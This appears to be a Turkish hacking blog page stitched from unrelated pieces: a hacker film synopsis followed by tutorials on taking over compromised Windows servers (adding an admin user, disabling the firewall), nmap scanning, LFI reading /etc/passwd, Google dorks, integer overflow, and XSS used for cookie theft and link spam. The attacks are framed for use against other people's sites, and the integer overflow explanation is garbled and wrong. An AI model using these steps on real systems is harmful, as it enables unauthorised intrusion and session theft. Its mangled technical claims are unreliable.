Yönetmen : Hakan Kadıoğlu
Yıllarını siber suça vermiş bir Hacker, devlet tarafından aranmaktadır. Siber Güvenlik Teşkilatı’nın aradığı bu Hacker uluslararası şirketlere zarar vermekte, bir çok şirket ağına sızıp, şirket içi özel bilgileri hackleyerek başka ülkelerdeki kişi ve kurumlara satmaktadır.
2 yıldır peşinde oldukları bu Hacker için başlatılan operasyon, başbakanlığa bağlı özel birim Siber Güvenlik Teşkilatı tarafından yürütülmekte ve birimin başında olan başkan Mithat tarafından yakından takip edilmektedir. Amaçları bu Hacker‘ı yakalamak, aynı zamanda devlet için etkin bir rolde kullanmaktır. Kod adı Kurtbey olan bu Hacker, iki yılın sonunda bir iş için topladığı hacker grubuyeni bir saldırı girişiminde bulunurlar. Grubun açık vermesi ile Siber Güvenlik birimini harekete geçirirler. Birim hızlı bir şekilde yerlerini tespit etmeye çalışır. Grup verdikleri açıktan dolayı daha fazla gizliliğini koruyamaz ve açığa çıkarak yakalanırlar, ancak grubun lideri olan Kurtbey için her şey yeni başlamaktadır.


http://mustafakarahaliloglu.com/wp-content/uploads/2016/08/13797335_159317684477953_261100851_n-1.mp4?_=1
Selamün aleyküm

Windows serverlarda tam yetki sahibi olabilmek için yani bir sistem yöneticisi kadar yetki sahibi olabilmemiz için girmiş olduğumuz websitesine shell atıp daha sonra bir takım kodlar ile root olup tüm sistemi ele geçiricez . Hemen başlayacak olursak çekmiş olduğum videoda herşey mevcuttur kodları aşağırdan bulabilirsiniz .



-Kullanıcı ekleme
net user misafir 123456 /add

-kullanıcıyı admin yapma
net localgroup "Administrators" /add misafir

-firewall kapatma komutu :
netsh firewall set opmode disable


Sunucu ip adresini bulma
-ipconfig /all

Selamün aleyküm arkadaşlar ;

Nmap ileri seviye kullanım adlı makalemizde nmapın operatör kullanımından bahsedeceğiz hemen başlayalım ;

Nmap kali linuxta bulunmakta fakat siz windowsta kullanmak istiyorsanız tavsiyem pentestboxu indirmeniz veya direk https://nmap.org/ adresinden indirebilirsiniz fakat windows ortamında linux rahatlığını veren pentestbox tavsiyemdir pentestbox için buyrun ;

https://pentestbox.com/#download indirebilirsiniz .

Şimdi hemen nmapın kullanımına geçelim

nmapın kullanımı

Görmüş olduğunuz gibi nmap normal bir ip adresinde portları tarıyor şimdi portların durumuna bakmak için şu kavramların ne anlama geldiğini bilmemiz gerek .

OPEN : PORT AÇIK MANASINA GELMEKTEDİR.
CLOSED : KAPALI ANCAK ERİŞİLEBİLİR MANASINA GELMEKTEDİR .
FİLTERED : BU KAVRAM İSE NMAPIN PORTUN AÇIK KAPALI OLDUĞUNA KARAR VEREMEMESİ DURUMUDUR .

Mesela burda basit olarak nmap ip adresi yazarak portların durumunu gördük , fakat taramayı hızlandıracak veya genişletmek gibi detaylandırmak gibi geniş çaplı arama gibi  bir işlem yapacak olursak bunlar için ise ip adresinin önüne bir takım karakterler girmemiz gerekecektir bunlar ise ;

-A = OS VERSİYONU BULMA SCRİPT TARAMASI YAPAR  | TRAERATE ÖZELLİĞİ TAŞIR .

-T4 = 5 ŞEKİLDE İNCELENİR , -T1 , -T2 ... GİBİ 5E KADAR GİDER DAHA HIZLI BİR ŞEKİLDE TARAMAYA YARDIMCI OLUR .

-sL = HEDEFLERİ VE DNS ADRESLERİNİN LİSTESİNİ ÇIKARIR .

-sn = PORT SCAN SEÇENEĞİNİ İPTAL EDER .

-Pn = HOST DİSCOVERY YAPMAZ  , BÜTÜN PORTLAR AYAKTA GÖZÜKÜR .

-r = PORTLARI SIRAYLA TARAR . SİSTEMATİK BİR ŞEKİLDE .

-e = NETWORK ARAYÜZÜNÜ BELİRLEMEK AMACIYLA KULLANILIR .


Selamün Aleyküm Arkadaşlar ;


Bu yazımızda sizlere başlıktaki açıkların nasıl oluştuğunu , nasıl kapatıldığını ve nasıl exploit edilebileceği konusunda bilgim doğrultusunda aktarmaya çalışacağım , 

Bu açıklar yıllardır var olup hala günümüzdede bolca bulunmaktadır , web uygulama geliştiricileri webmaster diye tabir ettiğimiz meslek grubundaki insanları bilgisizlikleri , gözden kaçırmaları , dikkat etmemeleri gibi durumlarda oluşur bu açık türleri , hackerlarda bu durumdan faydalınarak sistemi ele geçirebilip zarar verebilirler . Hatta sadece sizin sistemi bile değil tüm sunucuya zarar verebilirler .


Şimdi Bu zaafiyetleri içeren bir kod parçası yazalım ;

<?php

include(bul.php);

?>

Şimdi buradaki kodu inceleyecek olursak include parantez içerisindeki sayfayı dahil etmek için kullanılır . Yani bu kodudda include bul.php dosyasını dahil eder. Bizde şöyle bi senaryo düşünelim .
bul.php'yi dahil ettik lakin böyle bir dosya yoksa ? işte tam olarakda burada gerçekleşiyor zaafiyet eğerki bu sayfa yoksa karşımıza şöyle bir hata alacağız .

Warning: include(bul.php) functinon.include 

...........................................


gibi bi sayfa hatasıyla karşılaşacağız , 



Şimdi biz include ettiğimiz bul.phpnin urlde gözükeceği adres site.com/savo.php?id=bul.php olacaktır biz bul.php yerine 
Dikkat edelimki arkadaşlar ’bul’ yerine ../../../etc/passwd değerini gönderdik ve uygulama vasıtasıyla
sunucu üzerindeki /etc/passwd dosyasını okumuş olduk .Kod parçaçığı ’bul’ değerini aldığında aşağıdakine
benzer yol izlemektedir. /tomcat/webapps/application+../../../../../etc/passwd değeri birleştirilmiş
ve ../ yardımı ile bir üst dizine çıkarak ilerlenmiştir.En üst root dizine gelindiğinde ise ../ dizin
gezinimi parametrelerinin artık bir anlam ifade etmediğini yani ’../’ sayısının çokluğunun önemli olmadığını
ve kök dizine kalarak /etc/passwd dosyasına erişim sağlanıp , okunmasını sağlamıştır.Bu sayede yetki dahilinde
bulunan işletim sistemi üzerindeki dosyalar okunabilmektedir .


VE En Önemlisi ise bu açıktan nasıl shell atılır sorusu olacaktır cevap olarak buyrun video ;







Google Hacking Database


Şimdi öncelikle neden Google diyecek olursanız Google bu alanda dünyanın en iyisi ondan dolayı biz Googleyi göz önünde bulundurarak işlemlerimizi yapacağız , Google demişken herkes googleyi zannımca aramak istediği kelimeyi aratarak bulur mesela güvenlik ile ilgili bişiler bulmak istiyorsanız güvenlik yazarsınız ve size açıklamasında veya domain adında veya başlığında güvenlik  ile ilgili sonuçları verir fakat biz sadece urlsind güvenlik geçen veya sadece başlığında güvenlik geçen siteleri bulmak istiyorsak yazmış olduğumuz güvenlik adlı isim işimize yaramayacaktır işte burda devreye googlenin spesifik arama kelimeleri giriyor , mesela inurl:.php?id= yazdığımız zaman bize urlsinde .php?id= bulunan web sitelerini döker , resimde gördüğümüz gibi .

dork

İşte biz bu gruplama yapan kelimelere GOOGLE Operatörleri deriz ,

Bunlar ;

''+'' ( ARTI ) : Bir kelimeni başına gelirse geldiği kelimeyi aramaya dahil eder .
''-'' (EKSİ) :Bir kelimenin başına gelirse geldiği kelimeyi aramada göstermez .
* : Herhangi anlamına gelir .
() : gruplama anlamına gelir . Bunlar örnek amaçlıdır yoksa google operatörü daha fazladır. 


Diğer operatörler de şu şekildedir ;



Site: Bir websitesinin googlede indexlenmiş sayfalarını gösterir.
Ext : Arama yapılacak dosya tiplerini belirtir . (.doc .txt .xls gibi )
inurl:Belirtilen kelimeyi urlde arar.
intext: Belirtilen sorguyu sayfanın içeriğinde arar. 
related:Belirtilen sayfanın içeriğine yakın sayfaları gösterir.

Şimdi bu belirtmiş olduğum operatörler özet olarak geçtim desem yeridir . Bunlara undergrounda genel tabiriyle 'dork ' denir .

Kullanımından Bahsetmek Gerekirse ;


Selamlar Saygılar Arkadaşlar ;



Integer Overflow türkçe adıyla TAMSAYI TAŞMASI demektir , bu problem daha çok alçak seviyeli diye tabir edilen low level de denir , C,C++ gibi programlama dillerinde ortaya çıkar . Bu problem integer tipindeki bir değişkenin alabileceği maksimum büyüklükteki sayıdan daha büyük bir sayı verdiğimizde ortaya çıkan değişimdir . Önrke verecek olursak 32 bit signed integer bir değer için 2*31)-1 :2147483647 en büyük değer olacaktır . Lain pozitif sayının toplamı acaba negatif olabilirmi ?


Hemen Örnekleyelim ;


-------------
| buraya | + 5 = 
-------------

-------------
| 5 | + 5 = 10 --------------------------------> Girdiğimiz rakamlar Integerdeki max değerine kadar normal şekilde toplamayı yapacaktır.
------------- Peki ya max değerin üstünde bir değer girilirse ? Max Değer = 500
-------------
|501 | + 5 = -506
------------- 
Şeklinde 2 Pozitif sayının toplamı ile elde edilen negatif sayı olacaktır. Buradaki sayı bilgisayardaki Integer değeri olarak temsil edilebilecek en 
büyük sayıdan bir fazladır.Bu durumda ise taşma olup sonuç negatif çıkacaktır.
Bu durumda ise basit bir toplama işlemi yapan uygulamaların , büyük bir sayı karşısında nasıl davrandığını görmüş bulunduk arkadaşlar .
#include <stdio.h>
#include <string.h>
int main(int argc,char **argv){
int i;
unsigned short int a;
char *ptr="C Dilinde İnteger Overflowa Örnek by Turk DevilZ";
i = atoi(argv[1]);
a = i;
if(a > strlen(ptr)){ [1]
printf("length is too long");
return -1;
}
printf("character: %c",ptr); [2]

}
#./hello 6
Character: r
#./hello 500
length is too long
#./hello 500
Segmentation(Integer Overflow)
Daha önceki olan son örneğimizde bahsettiğimiz sorundan Dolayı Segmentetion(Integer Overflow) oluştu.
501 değeri Integerdeki Max değerimiz olan 500 den büyük olduğu için İşlem sonucunda aşağıdaki gibi değerler elde edilir.
500 mod(500+1)=0
Bundan dolayı 
i = atoi(argv[1]);
a = i;
if(a > strlen(ptr)){ ------> ile belirtilen yerde 0> strlen(PRT) şartının sonucunda if-else yapısının içine girmek yerine 
printf("character: %c",ptr); --------> Satırının içine girmektedir.


XSS



XSS - Cross Site Scripting yani türkçe adıyla Siteler Arası Betik Çalıştırma ; Kendisi geçmiştede var olduğu gibi günümüzdede varlığını sürdürmektedir hatta facebook , twitter , yahoo gibi sitelerde hala bulunmakta ve her geçen gün bu açıktan bug bounty kapsamında ödüller alınmakta ve hall of fameye girilmektedir .

Xss Zaafiyetinden bahsetmek gerekirse html , css , javascript ile hazırlanmış kod parçacıklarının hedeflediğimiz istemcide  izinsiz olarark çalıştırılmasından kaynaklanmaktadır . Xss zaafiyeti web uygulamalarında kullanıcı girdisi yapılabilen alanlar diye tabir edilen arama kısmı , ziyaretçi defteri , yorum kısımları gibi alanlarda bulunup buralardan  çıkarılan verilerde hedeflediğimiz kullanıcı olur , ziyaretçi olur , admin olur bunun gibi hedeflerimizin oturum bilgisini çalar ve istediğimiz
şekilde kullanırız .

XSS Zaafiyeti yaygın olarak Yansıtılmış ( Reflected ) XSS ;

Bildiğimiz gibi girmiş olduğumuz çoğu web sitesi kullanıcı ile etkileşim halindedir . Ziyaretçilerin veya kullanıcıların veri girmesine ve sonra girilen verilere göre oluşuturulmuş dinamik sayfalara tekrar kullanıcılara gösterilmesine olanak sağlamaktadır .Şimdi biraz açıklayıcı konuşmak gerekirse www.campaignmotors.coma girdik dimi neden bu site dicek olursanız bu site bug bounty kapsamında yani önemli site şimdi biz bu sitede açıkmı bulmak istiyoruz ve bulmak istediğimiz açık XSSmi ozaman kardeşim arama kısmına gel herhangi bir html kodu yaz eğerki yazdığın html kodu çalışıyorsa xss var demektir ve bu çıktı sadece senin göreceğin şekildeyse yani veritabanına felan işlemiyorsa REFLECTED XSS var demektir .

Örnekleyelim bakalım ;

www.defacer-misafir.blogpsot.com/search.php?id=hack

dedik karşımıza hackla ilgili içerikler geldi işte buradaki hack kelimesini <script>alert(1)</script> diye değiştirirsek
karşımıza ekranda hack adlı bi içerik çıkacaktır .

Videodan Devam : 





Depolanmış (Stored ) XSS



Bu Xss çeşidide diğer xss çeşitleri gibi kullanıcının etkileşim sağladığı alanlarda bulunur ve gerçekleşir . Fakat en önemli fark girilen
girdiyi veritabanına kaydeder.

Örnekleyecek olursak ;

Mesela saldıracağınız bir websitesi var web sitesinde yorum yapabileceğiniz bir kısım var  siz bu kısma meta kodu attığınız zaman
o kod veritabanına kaydolacak ve sitenin yorum kısmı atmış olduğunuz meta kodundaki yönlendireceğiniz web sitesine yönelecektir.
Tabi sadece bununla sınırlı değil ister cookie de alırsınız veya hacklink kasarsınız o size kalmış bişi .

Videodan Devam ;